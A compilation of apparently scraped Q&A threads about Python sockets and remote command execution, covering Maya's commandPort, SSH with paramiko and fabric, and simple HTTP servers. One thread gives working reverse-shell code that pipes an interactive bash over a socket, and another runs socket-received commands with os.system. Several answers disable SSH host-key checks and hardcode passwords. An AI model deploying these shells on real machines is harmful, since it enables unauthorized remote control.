Sending multiline commands to Maya Through Python Socket - python

I want to know is there a way to send a multiline command to maya through python socket and the Maya's own "commandPort" command?
I'm using below code for sending the code to maya("message" value is the command):
import socket
#HOST = '192.168.1.122' # The remote host
HOST = '127.0.0.1' # the local host
PORT = 54321 # The same port as used by the server
ADDR=(HOST,PORT)
def SendCommand():
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
command = 'import maya.cmds as mc mc.polyCube()' # the commang from external editor to maya
MyMessage = command
client.send(MyMessage)
data = client.recv(1024) #receive the result info
client.close()
print 'The Result is %s'%data
if __name__=='__main__':
SendCommand()
When I send a single command like 'polyCube()' it works but for example sending a python
Command such as:
import maya.cmds as mc
mc.polyCube()
Raises an "invalid syntax error"!

Try:
command = 'import maya.cmds as mc\n mc.polyCube()'

For sending small commands to Maya, #pajton's method works, or you can use ; as a separator:
command = "import maya.cmds as mc; mc.polyCube()"
If possible, the easiest way to send many lines at once is to create a separate .py file that Maya has access to.
command = "import sys; sys.append(r'c:\path to my_script');"
command += "import my_script; my_script.run()"

Related

How to keep ssh connection open and doing multiple requests and outputs within python

Because this question seems to aim somewhere else I am going to point my problem here:
In my python script I am using multiple requests to a remote server using ssh:
def ssh(command):
command = 'ssh SERVER "command"'
output = subprocess.check_output(
command,
stderr=subprocess.STDOUT,
shell=True,
universal_newlines=True
)
return output
here I will get the content of file1 as output.
I have now multiple methods which use this function:
def show_one():
ssh('cat file1')
def show_two():
ssh('cat file2')
def run():
one = show_one()
print(one)
two = show_two()
print(two)
Executing run() will open and close the ssh connection for each show_* method which makes it pretty slow.
Solutions:
I can put:
Host SERVER
ControlMaster auto
ControlPersist yes
ControlPath ~/.ssh/socket-%r#%h:%p
into my .ssh/config but I would like to solve this within python.
There is the ssh flag -T to keep a connection open, and in the before mentioned Question one answer was to use this with Popen() and p.communicate() but it is not possible to get the output between the communicates because it throws an error ValueError: Cannot send input after starting communication
I could somehow change my functions to execute a single ssh command like echo "--show1--"; cat file1; echo "--show2--"; cat file2 but this looks hacky to me and I hope there is a better method to just keep the ssh connection open and use it like normal.
What I would like to have: For example a pythonic/bashic to do the same as I can configure in the .ssh/config (see 1.) to declare a specific socket for the connection and explicitly open, use, close it
Try to create ssh object from class and pass it to the functions:
import paramiko
from pythonping import ping
from scp import SCPClient
class SSH():
def __init__(self, ip='192.168.1.1', username='user', password='pass',connect=True,Timeout=10):
self.ip = ip
self.username = username
self.password = password
self.Timeout=Timeout
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if connect:
self.OpenConnection()
self.scp = SCPClient(self.ssh.get_transport())
def OpenConnection(self):
try:
skip_ping = False
ping_res=False
log.info('Sending ping to host (timeout=3,count=3) :'+self.ip)
try:
PingRes = ping(target=self.ip,timeout=3,count=3, verbose=True)
log.info('Ping to host result :' + str(PingRes.success()))
ping_res=PingRes.success()
except:
skip_ping=True
if ping_res or skip_ping:
log.info('Starting to open connection....')
self.ssh.connect(hostname=self.ip, username=self.username, password=self.password, timeout=self.Timeout, auth_timeout=self.Timeout,banner_timeout=self.Timeout)
self.scp = SCPClient(self.ssh.get_transport())
log.info('Connection open')
return True
else:
log.error('ssh OpenConnection failed: No Ping to host')
return False
myssh = SSH(ip='192.168.1.1',password='mypass',username='myusername')
the ping result is wrapped in try catch because sometimes my machine return an error you can remove it and just verify a ping to the host.
The self.scp is for file transfer.

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
cmd = s.recv(1024)
# single command execution currently (not interactive shell)
results = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(results)
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
cmd = raw_input('> ').rstrip()
conn.send(cmd)
results = conn.recv(4096)
print results
I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
fp.write(sys.stdin.read(4096))
proc1.wait()

Simple http server in Python 3.5.1 Shell

I am trying to get a simple http server going, using the directory in my code below as the root. This is using Python 3.5.1 Shell:
>>> import os
>>> import http.server
>>> import socketserver
>>> os.chdir('c:/users/owner/desktop/tom/tomsEnyo2.5-May27')
>>> python -m http.server 8000
SyntaxError: invalid syntax
>>> python -m SimpleHTTPServer 8000
SyntaxError: invalid syntax
>>>
I have looked at a similar topic: How to set up simple HTTP server in Python 3.5 on Windows 10? , but even when I try doing what the answer suggests, I still have the same problem ('invalid syntax').
You're confusing Python commands and shells command.
import os etc are Python statements (interpreted by Python), python -m http.server 8000 is a shell statement, interpreted by bash, sh or whatever Microsoft use for Windows. You may try something like this to run it in the Python REPL:
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
os.chdir('c:/users/owner/desktop/tom/tomsEnyo2.5-May27')
server_address = ('', 8000)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
httpd.serve_forever()
But the easiest way to do is probably to just run python -m http.server 8000 while being in the right directory in your terminal emulator. Note, on recent versions of Python, the http.server module also accept a --directory or -d option to specify the directory to serve.
The problem is that the python -m command is not a python command itself but should be used in the shell ;)
You can use instead:
import http.server
def start_server(port=8000, bind="", cgi=False):
if cgi==True:
http.server.test(HandlerClass=http.server.CGIHTTPRequestHandler, port=port, bind=bind)
else:
http.server.test(HandlerClass=http.server.SimpleHTTPRequestHandler,port=port,bind=bind)
start_server() #If you want cgi, set cgi to True e.g. start_server(cgi=True)
Or, you can also do:
import http.server
import socketserver
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
The idea itself of running a Web server into the Python shell is wrong as a server is a system-level process supposed to run forever. You can try to run it using the subprocess library maybe?
Furthermore, you cannot run python executable into the shell. Once you run the shell, you need to type code line by line, not OS executables.
If you wanto to start a server, you need instead to run the python executable from a directory in your OS command-line, using SimpleServer class; that directory will be served through the Web server.
import socket
import sys
try:
HOST = 'Your_ip'
PORT = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind((HOST, PORT))
s.listen(10)
print '[*]Running HTTP on port %s..'%PORT
while 1:
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
data = ""
while 1:
request = conn.recv(8000)
data += request
if len(data) == 24:
print data
req_list = data.split(' ')
method = req_list[0]
req_file = req_list[1]
print 'The Requested file from client: ', req_file
fileid = req_file.split('?')[0]
fileid = fileid.lstrip('/')
print fileid
if(fileid == 'index.html'): #verifies index.html
file = open(fileid,'rb')
response = file.read()
file.close()
header ='HTTP/1.1 200 OK\n'
mimetype = 'text/html'
header += 'Content-Type: '+str(mimetype)+'\n\n'
else:
header = 'HTTP/1.1 404 Not Found\n\n'
response = '<html><body><h3>Error 404: File not found</h3></body></html>'
final_response = header.encode('utf-8')
final_response += response
conn.send(final_response)
else:
continue
conn.close()
except KeyboardInterrupt as msg:
sys.exit(0)
An HTTP server(equivalent implementation in Linux) listens on port 80, and can be customized to listen on all different ports. This server parses the GET request and send successful response if index.html file is present, and its unsuccessful if client tries to access other .html file. Alternative to one liner bash web server

Remote Command Execution Python

For educational purposes, I set up a server that allows remote command execution on Windows - or rather, I tried to. For some reason, the command line refuses to recognize some of the commands I send, but others work fine. For instance, sending the command echo "Hello World!!!" causes, as it should, a cmd window to pop up reading "Hello World!!!". Fine. But when I send the command shutdown /s /t 30 it gives me the improper syntax / help screen for the shutdown command. When I send the command msg * "Hello World" it tells me that 'msg' is not a recognized internal or external command, operable program, or batch file. Here is my server code:
import socket
import sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = ('', 4242)
sock.bind(server_address)
sock.listen(1)
connection, client_address = sock.accept()
print("Connection established with %s " % str(client_address))
while True:
command = input("Enter a command: ")
connection.send(bytes(command, 'UTF-8'))
confirm = connection.recv(128)
if confirm == "yes":
print("[+] Command executed successfully.")
else:
print("[-] Command failed to execute!!!")
And here is my client code:
import socket
import sys
import os
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = ('', 42042)
sock.bind(server_address)
sock.connect(('192.168.1.5', 4242))
while True:
command = str(sock.recv(1024))
try:
os.system(command[2:]) # an odd thing, the commands somehow came out prefaced with "b'". Ideas?
sock.send(bytes("yes", 'UTF-8'))
except:
sock.send(bytes("no", 'UTF-8'))
So yeah, that's that. The fact that only SOME commands are getting screwed up is really confusing me. Anybody have any ideas? Also, what's up with that "b'"?
str(sock.recv(1024)) is not the way to convert a bytes object into a string, you should be using the sock.recv(1024).decode('UTF-8') method
You can look at the documentation for bytes.decode https://docs.python.org/3.4/library/stdtypes.html#bytes.decode
Or this related question Best way to convert string to bytes in Python 3?

Perform commands over ssh with Python

I'm writing a script to automate some command line commands in Python. At the moment, I'm doing calls like this:
cmd = "some unix command"
retcode = subprocess.call(cmd,shell=True)
However, I need to run some commands on a remote machine. Manually, I would log in using ssh and then run the commands. How would I automate this in Python? I need to log in with a (known) password to the remote machine, so I can't just use cmd = ssh user#remotehost, I'm wondering if there's a module I should be using?
I will refer you to paramiko
see this question
ssh = paramiko.SSHClient()
ssh.connect(server, username=username, password=password)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd_to_execute)
If you are using ssh keys, do:
k = paramiko.RSAKey.from_private_key_file(keyfilename)
# OR k = paramiko.DSSKey.from_private_key_file(keyfilename)
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, username=user, pkey=k)
Keep it simple. No libraries required.
import subprocess
# Python 2
subprocess.Popen("ssh {user}#{host} {cmd}".format(user=user, host=host, cmd='ls -l'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
# Python 3
subprocess.Popen(f"ssh {user}#{host} {cmd}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
Or you can just use commands.getstatusoutput:
commands.getstatusoutput("ssh machine 1 'your script'")
I used it extensively and it works great.
In Python 2.6+, use subprocess.check_output.
I found paramiko to be a bit too low-level, and Fabric not especially well-suited to being used as a library, so I put together my own library called spur that uses paramiko to implement a slightly nicer interface:
import spur
shell = spur.SshShell(hostname="localhost", username="bob", password="password1")
result = shell.run(["echo", "-n", "hello"])
print result.output # prints hello
If you need to run inside a shell:
shell.run(["sh", "-c", "echo -n hello"])
All have already stated (recommended) using paramiko and I am just sharing a python code (API one may say) that will allow you to execute multiple commands in one go.
to execute commands on different node use : Commands().run_cmd(host_ip, list_of_commands)
You will see one TODO, which I have kept to stop the execution if any of the commands fails to execute, I don't know how to do it. please share your knowledge
#!/usr/bin/python
import os
import sys
import select
import paramiko
import time
class Commands:
def __init__(self, retry_time=0):
self.retry_time = retry_time
pass
def run_cmd(self, host_ip, cmd_list):
i = 0
while True:
# print("Trying to connect to %s (%i/%i)" % (self.host, i, self.retry_time))
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host_ip)
break
except paramiko.AuthenticationException:
print("Authentication failed when connecting to %s" % host_ip)
sys.exit(1)
except:
print("Could not SSH to %s, waiting for it to start" % host_ip)
i += 1
time.sleep(2)
# If we could not connect within time limit
if i >= self.retry_time:
print("Could not connect to %s. Giving up" % host_ip)
sys.exit(1)
# After connection is successful
# Send the command
for command in cmd_list:
# print command
print "> " + command
# execute commands
stdin, stdout, stderr = ssh.exec_command(command)
# TODO() : if an error is thrown, stop further rules and revert back changes
# Wait for the command to terminate
while not stdout.channel.exit_status_ready():
# Only print data if there is data to read in the channel
if stdout.channel.recv_ready():
rl, wl, xl = select.select([ stdout.channel ], [ ], [ ], 0.0)
if len(rl) > 0:
tmp = stdout.channel.recv(1024)
output = tmp.decode()
print output
# Close SSH connection
ssh.close()
return
def main(args=None):
if args is None:
print "arguments expected"
else:
# args = {'<ip_address>', <list_of_commands>}
mytest = Commands()
mytest.run_cmd(host_ip=args[0], cmd_list=args[1])
return
if __name__ == "__main__":
main(sys.argv[1:])
paramiko finally worked for me after adding additional line, which is really important one (line 3):
import paramiko
p = paramiko.SSHClient()
p.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # This script doesn't work for me unless this line is added!
p.connect("server", port=22, username="username", password="password")
stdin, stdout, stderr = p.exec_command("your command")
opt = stdout.readlines()
opt = "".join(opt)
print(opt)
Make sure that paramiko package is installed.
Original source of the solution: Source
The accepted answer didn't work for me, here's what I used instead:
import paramiko
import os
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# ssh.load_system_host_keys()
ssh.load_host_keys(os.path.expanduser('~/.ssh/known_hosts'))
ssh.connect("d.d.d.d", username="user", password="pass", port=22222)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("ls -alrt")
exit_code = ssh_stdout.channel.recv_exit_status() # handles async exit error
for line in ssh_stdout:
print(line.strip())
total 44
-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc
-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrc
-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc
...
Alternatively, you can use sshpass:
import subprocess
cmd = """ sshpass -p "myPas$" ssh user#d.d.d.d -p 22222 'my command; exit' """
print( subprocess.getoutput(cmd) )
References:
https://github.com/onyxfish/relay/issues/11
https://stackoverflow.com/a/61016663/797495
Notes:
Just make sure to connect manually at least one time to the remote system via ssh (ssh root#ip) and accept the public key, this is many times the reason from not being able connect using paramiko or other automated ssh scripts.
I have used paramiko a bunch (nice) and pxssh (also nice). I would recommend either. They work a little differently but have a relatively large overlap in usage.
First: I'm surprised that no one has mentioned fabric yet.
Second: For exactly those requirements you describe I've implemented an own python module named jk_simpleexec. It's purpose: Making running commands easy.
Let me explain a little bit about it for you.
The 'executing a command locally' problem
My python module jk_simpleexec provides a function named runCmd(..) that can execute a shell (!) command locally or remotely. This is very simple. Here is an example for local execution of a command:
import jk_simpleexec
cmdResult = jk_simpleexec.runCmd(None, "cd / ; ls -la")
NOTE: Be aware that the returned data is trimmed automatically by default to remove excessive empty lines from STDOUT and STDERR. (Of course this behavior can be deactivated, but for the purpose you've in mind exactly that behavior is what you will want.)
The 'processing the result' problem
What you will receive is an object that contains the return code, STDOUT and STDERR. Therefore it's very easy to process the result.
And this is what you want to do as the command you execute might exist and is launched but might fail in doing what it is intended to do. In the most simple case where you're not interested in STDOUT and STDERR your code will likely look something like this:
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
For debugging purposes you want to output the result to STDOUT at some time, so for this you can do just this:
cmdResult.dump()
If you would want to process STDOUT it's simple as well. Example:
for line in cmdResult.stdOutLines:
print(line)
The 'executing a command remotely' problem
Now of course we might want to execute this command remotely on another system. For this we can use the same function runCmd(..) in exactly the same way but we need to specify a fabric connection object first. This can be done like this:
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_PORT = 22
REMOTE_LOGIN = "mylogin"
REMOTE_PASSWORD = "mypwd"
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(c, "cd / ; ls -la")
# ... process the result stored in cmdResult ...
c.close()
Everything remains exactly the same, but this time we run this command on another host. This is intended: I wanted to have a uniform API where there are no modifications required in the software if you at some time decide to move from the local host to another host.
The password input problem
Now of course there is the password problem. This has been mentioned above by some users: We might want to ask the user executing this python code for a password.
For this problem I have created an own module quite some time ago. jk_pwdinput. The difference to regular password input is that jk_pwdinput will output some stars instead of just printing nothing. So for every password character you type you will see a star. This way it's more easy for you to enter a password.
Here is the code:
import jk_pwdinput
# ... define other 'constants' such as REMOTE_LOGIN, REMOTE_HOST ...
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "#" + REMOTE_HOST + ": ")
(For completeness: If readpwd(..) returned None the user canceled the password input with Ctrl+C. In a real world scenario you might want to act on this appropriately.)
Full example
Here is a full example:
import jk_simpleexec
import jk_pwdinput
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_PORT = 22
REMOTE_LOGIN = "mylogin"
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "#" + REMOTE_HOST + ": ")
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(
c = c,
command = "cd / ; ls -la"
)
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
c.close()
Final notes
So we have the full set:
Executing a command,
executing that command remotely via the same API,
creating the connection in an easy and secure way with password input.
The code above solves the problem quite well for me (and hopefully for you as well). And everything is open source: Fabric is BSD-2-Clause, and my own modules are provided under Apache-2.
Modules used:
fabric : http://www.fabfile.org/
jk_pwdinput : https://github.com/jkpubsrc/python-module-jk-pwdinput
jk_simplexec : https://github.com/jkpubsrc/python-module-jk-simpleexec
Happy coding! ;-)
Works Perfectly...
import paramiko
import time
ssh = paramiko.SSHClient()
#ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('10.106.104.24', port=22, username='admin', password='')
time.sleep(5)
print('connected')
stdin, stdout, stderr = ssh.exec_command(" ")
def execute():
stdin.write('xcommand SystemUnit Boot Action: Restart\n')
print('success')
execute()
You can use any of these commands, this will help you to give a password also.
cmd = subprocess.run(["sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root#domain.com ps | grep minicom"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print(cmd.stdout)
OR
cmd = subprocess.getoutput("sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root#domain.com ps | grep minicom")
print(cmd)
Have a look at spurplus, a wrapper we developed around spur that provides type annotations and some minor gimmicks (reconnecting SFTP, md5 etc.): https://pypi.org/project/spurplus/
Asking User to enter the command as per the device they are logging in.
The below code is validated by PEP8online.com.
import paramiko
import xlrd
import time
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0, 1)
Port = int(sheet.cell_value(3, 1))
User = sheet.cell_value(1, 1)
Pass = sheet.cell_value(2, 1)
def details(Host, Port, User, Pass):
time.sleep(2)
ssh.connect(Host, Port, User, Pass)
print('connected to ip ', Host)
stdin, stdout, stderr = ssh.exec_command("")
x = input('Enter the command:')
stdin.write(x)
stdin.write('\n')
print('success')
details(Host, Port, User, Pass)
#Reading the Host,username,password,port from excel file
import paramiko
import xlrd
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0,1)
Port = int(sheet.cell_value(3,1))
User = sheet.cell_value(1,1)
Pass = sheet.cell_value(2,1)
def details(Host,Port,User,Pass):
ssh.connect(Host, Port, User, Pass)
print('connected to ip ',Host)
stdin, stdout, stderr = ssh.exec_command("")
stdin.write('xcommand SystemUnit Boot Action: Restart\n')
print('success')
details(Host,Port,User,Pass)
The most modern approach is probably to use fabric. This module allows you to set up an SSH connection and then run commands and get their results over the connection object.
Here's a simple example:
from fabric import Connection
with Connection("your_hostname") as connection:
result = connection.run("uname -s", hide=True)
msg = "Ran {0.command!r} on {0.connection.host}, got stdout:\n{0.stdout}"
print(msg.format(result))
I wrote a simple class to run commands on remote over native ssh, using the subprocess module:
Usage
from ssh_utils import SshClient
client = SshClient(user='username', remote='remote_host', key='path/to/key.pem')
# run a list of commands
client.cmd(['mkdir ~/testdir', 'ls -la', 'echo done!'])
# copy files/dirs
client.scp('my_file.txt', '~/testdir')
Class source code
https://gist.github.com/mamaj/a7b378a5c969e3e32a9e4f9bceb0c5eb
import subprocess
from pathlib import Path
from typing import Union
class SshClient():
""" Perform commands and copy files on ssh using subprocess
and native ssh client (OpenSSH).
"""
def __init__(self,
user: str,
remote: str,
key_path: Union[str, Path]) -> None:
"""
Args:
user (str): username for the remote
remote (str): remote host IP/DNS
key_path (str or pathlib.Path): path to .pem file
"""
self.user = user
self.remote = remote
self.key_path = str(key_path)
def cmd(self,
cmds: list[str],
strict_host_key_checking=False) -> None:
"""runs commands consecutively, ensuring success of each
after calling the next command.
Args:
cmds (list[str]): list of commands to run.
strict_host_key_checking (bool, optional): Defaults to True.
"""
strict_host_key_checking = 'yes' if strict_host_key_checking \
else 'no'
cmd = ' && '.join(cmds)
subprocess.run(
[
'ssh',
'-i', self.key_path,
'-o', f'StrictHostKeyChecking={strict_host_key_checking}',
'-o', 'UserKnownHostsFile=/dev/null',
f'{self.user}#{self.remote}',
cmd
]
)
def scp(self, source: Union[str, Path], destination: Union[str, Path]):
"""Copies `srouce` file to remote `destination` using the
native `scp` command.
Args:
source (Union[str, Path]): Source file path.
destination (Union[str, Path]): Destination path on remote.
"""
subprocess.run(
[
'scp',
'-i', self.key_path,
str(source),
f'{self.user}#{self.remote}:{str(destination)}',
]
)
Below example, incase if you want user inputs for hostname,username,password and port no.
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def details():
Host = input("Enter the Hostname: ")
Port = input("Enter the Port: ")
User = input("Enter the Username: ")
Pass = input("Enter the Password: ")
ssh.connect(Host, Port, User, Pass, timeout=2)
print('connected')
stdin, stdout, stderr = ssh.exec_command("")
stdin.write('xcommand SystemUnit Boot Action: Restart\n')
print('success')
details()

Categories